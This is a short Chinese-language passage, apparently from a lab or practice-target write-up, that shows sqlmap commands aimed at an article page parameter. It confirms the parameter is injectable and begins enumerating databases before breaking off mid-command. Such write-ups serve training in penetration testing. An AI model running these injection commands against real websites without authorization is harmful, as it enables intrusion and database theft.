进入靶机 打开sqlmap 先找注入点,然后再将网站丢到sqlmap里面测试能不能注入 sqlmap.py -u "http://.../narticle.php?nid=3050" 这里显然是可以注入的,然后再找数据库 sqlmap.py -u "htt